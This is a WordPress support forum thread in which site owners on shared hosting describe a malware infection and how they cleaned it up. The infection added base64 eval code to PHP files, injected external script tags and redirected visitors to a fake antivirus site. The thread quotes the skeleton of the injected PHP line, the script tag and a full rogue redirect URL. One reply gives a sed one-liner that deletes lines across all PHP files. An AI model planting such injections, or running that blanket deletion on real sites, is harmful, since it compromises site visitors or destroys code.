• Both wp-adin/dashboard and my site is getting redirected to:

    [Mod note – links removed]

    Today, 04/14/2010 i logged into dashboard and it was crashed.
    I tried to refresh many a times and it still was crashed,
    and i saw this address running fast in the Task Bar:

    [Mod note – links removed]

    After sometime the dashboard started redirecting to bing.com mentioned above.

    Changes i did today:

    1. Uninstalled wp-united.
    2. Uninstalled Phpbb.
    3. Installed Beeline wp plugin.
    4. INSTALLED wp plugin Tal.Ki (Tal.ki Embeddable Forums)

    I came to know my site has been HACKED and googled few solutions.

    1. Changed Wp Admin Password.
    2. Changed FTP Password.
    3. Saw this code in Page Source:

    <script type='text/javascript'>
    /* <![CDATA[ */
    var thickboxL10n = {
    	next: "Next >",
    	prev: "< Prev",
    	image: "Image",
    	of: "of",
    	close: "Close"
    var commonL10n = {
    	warnDelete: "You are about to permanently delete the selected items.\n  \'Cancel\' to stop, \'OK\' to delete."
    var wpAjax = {
    	noPerm: "You do not have permission to do that.",
    	broken: "An unidentified error has occurred."
    var adminCommentsL10n = {
    	hotkeys_highlight_first: "",
    	hotkeys_highlight_last: ""
    var plugininstallL10n = {
    	plugin_information: "Plugin Information:"
    /* ]]> */
    <script type='text/javascript' src='https://indiangirlsclub.com/wp-admin/load-scripts.php?c=1&load=thickbox,hoverIntent,common,jquery-color,jquery-ui-core,jquery-ui-sortable,wp-ajax-response,wp-lists,jquery-ui-resizable,admin-comments,postbox,dashboard,plugin-install,media-upload&ver=b92e060c1632e7b2fe6ec9809056c0d0'></script>
    <script type="text/javascript">if(typeof wpOnload=='function')wpOnload();</script>
    <script src="[Mod note - links removed]/js.php"></script>

    5. Removed this code from Index.php and Load-Scripts.php :

    <?php /**/ eval(base64_decode[Mod note - base64 code removed]"));?>

    6. Uninstalled Tal.Ki Plugin.

    Still my site is not clean.

    It’s getting redirected to :

    [Mod note – links removed]

    Site Url: https://indiangirlsclub.com
    Please HELP me. I’m not a tech savvy. What else should i do ???

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  • @mrmist too bad though that you removed the domains so now we can’t point folks here to let them know what to look for.

    Someone care to return the domains in question but break the links please? That way others can read this thread and know what to look for?


    I don’t really see the benefit in having the spam links added back, be they broken or otherwise. Most likely it’s different for everyone, and in any event I’m not convinced it’s of value.

    Sheesh, you really can’t please everyone.

    For the record: My fix and an observation…

    I noticed the other day that my WP admin dashboard was screwy and posting was nearly impossible. My friend suggested logging in to GoDaddy and installing the latest WP patch. That seemed to take care of it. Except the base64 code was still around and the strange script url in question kdjkfjskd…com/js.php (at the end of html code on all pages on my site) kept showing up.
    Obviously, not fixed. So check the last few lines of your page source code if you aren’t sure if its gone!

    So I started the process of backing up and restoring. In that process I noticed an odd php file in the root directory which had nothing but base64 code. Decoding it showed that exact offending url and lots of commands that I have no clue about. I can only guess it to be the source of the infection. Don’t know how it got there (would like to know- guess a call to GoDaddy is in order to see if they can check ftp logs), but can tell from the restore history that it showed up on 14 April. I copy/pasted everything that I’d written this week to a word doc and restored to pre-infection. And Promptly changed passwords and virus scanned all my computers.

    Curious about that file, so I checked my friend’s Site, same file, but a different name: Mine was called “public_ride.php”, hers called “surprised_nealson.php”.

    Considering the alternative of having to wipe the site completely and re-upload, I’m relieved that this seems to have solved it. Now we need to figure out how this happened.

    For what its worth!

    Thread Starter Hema Latha


    @ rockinmama ..

    In the root directory, they had placed a file: “lira_seville.php”,
    which contained only those Eval Base64 codes.

    Suddenly another folder is present: .hcc.thumbs
    Not sure what it is, I deleted that too.

    And even after removing all those codes MANUALLY,
    my blog showed those “…kdjkfjskdfjlskdjf…com”

    I have completely deleted everything in the FTP except wp-content.
    Replaced all wordpress files freshly downloaded.
    Things seem to work smoothly.

    But still afraid about the BACKDOORS as i’m not familiar with database.
    I have installed few plugins for security, database and firewall.

    Lost 4images, Topsites Directory, Forum, Another wp blog installed in the same root directory with buddypress.

    Googling revealed that most of the blogs hacked were in Godaddy Shared Hosting Server.


    Measures are in place to protect the overall security of the shared hosting server on which your website resides. The compromise of your account is outside of the scope of security that we provide for you. Virus scans are performed on the content that is hosted, but they may not pick up everything, largely due to the fact that hackers tend to upload custom scripts which are not picked up by traditional malware scanners. However, if a virus is detected, you will be notified. The overall security of your password and the content within your account is your responsibility, as password compromises and compromises due to scripting can only be prevented by you.

    Let me know how was the blogs hacked !
    (so that we can avoid such mistakes in future).

    I believe that this is the official WordPress explanation of what happened to you, Hema:

    And I concur: it really is up to web hosting companies to prevent, by default, any visibility of your files and databases to other users of the same web server. Yes, I know they call it a “shared hosting environment”, but I have every right to expect web hosting companies to have the smarts to protect me from everyone else on the same server.

    I had the same thing happen to me on a Linux GoDaddy server. It hit every php file. I had to uninstall and reinstall everything including WP. I must have made 50 phone calls to GoDaddy. They were helpful- probably spoke to wpsecuritylock above who happens to be my hero at the moment.

    This thing is nasty!


    The same thing was happened on my php site but it’s not using word press. The same script was ejecting if the user remove the valuse starting on “base64_decode” on index.php. All the files are injected this values. I’m using Godaddy Hosting and I didn’t get a satisfactory response from them yet.

    This patch will cure my problem.

    SSH to server and execute this command. Switch to “html folder” and then execute.

    $find . -type f -name “*.php” -exec sed -i ‘/base64_decode/d’ {} \;


    It’s a nasty malware but it’s not that hard to get rid of. If you have GoDaddy you can use their file manager to restore your files. Change all your passwords to secure ones. More info on the fix here.

    I have shared hosting on godaddy. Random php files in six sites were hit. I have cleaned and restored all but word press site. I saved a restore from an earlier date and then did the restore locally using Deamweaver cs3. Every site is clean BUT WordPress and I can’t find any infected files. I still see that script at the end when I view the source page. Any advice for me?

    Thread Starter Hema Latha



    My blog is hacked again.
    I have cleared everything and changed the passwords, installed security plugins. But now my site is hacked again.

    It’s again has the same script in the Page Source:

    <script src="https:// kdjkfjskdfjlskdjf . com/kp.php"></script>

    And my antivirus program has blocked my site and giving an Alert.
    Site is getting redirected to the below link.

    https:// www1 . protectsys28-pd.xorg.pl/?p=p52dcWpkbG6HjsbIo216h3de0KCfYWCcU9LXoKitioaLw8ydb5aYen5arK3NasiXk2Rea2JrmV2ZVqPajtfZ1m5do3OL1cytnpl2Wp6dpJ6eU9rPlqdqWpuooV6UYl6XY5eSlWVsYGiYk4mrl5p2nKyoqHOQXM3UlZmOopmh1pnVk5zbj5HH0p5mWKrYnpRraWZwaGhlaHCHodeYbmFfa2RvmF2TYGeMkMahrH9dqZ%2FJnptyag%3D%3D

    All the php files have this code on the first line:

    I feel to Quit blogging.

    Thread Starter Hema Latha


    @ Dmgeo …

    As you suggested i Restored all the files using Godaddy File Manager.

    Site is working and unable to find the kdjkfjskdfjlskdjf script in the page source and the eval base code in the php files.

    But when i tried to Login to Wp-admin, I got this message from AVG:

    Threat was blocked!

    File name: http: / / www1 . protectsys28-pd.xorg.pl/?p=p52dcWpkbG6HjsbIo216h3de0KCfYWCdU9LXoKitioaLw8ydb5aYen5arK3NasiXk2Rea2JrmV2ZVqPajtfZ1m5oWKeih9eipqCecV6aoaXGaorcmpWkcVih1GqTYmKUXpmYkWNrZ2SXlJVfpJmfcaCorKmbXJPPn5SWlaCfzZ%2FOo5PSosWSxqCkYa3Vjs%2BomZ2nYqicqHjTksjPo5WQqJGs02rKpKTWUpaliGN9V2irytGdm5Wnm6GmpKzEmdnIX5OcoVdqqqTSXZHKmszSiGN9WKrYnpRraWZwaHBrbm%2BHodeYbmFfa2RvmGWZZmaMkMahrH9dqZ%2FJnptyag%3D%3D

    Threat name: Exploit Rogue Security Threat Analysis 9type 1007)

    I’m unable to access the wp admin/login panel.

    Thread Starter Hema Latha



    1. Restored files using Godaddy file manager.

    After restoration, site worked but the Login/Admin page was redirected to the virus site.

    2. Replaced Wp-admin & Wp-includes.

    Issue resolved.


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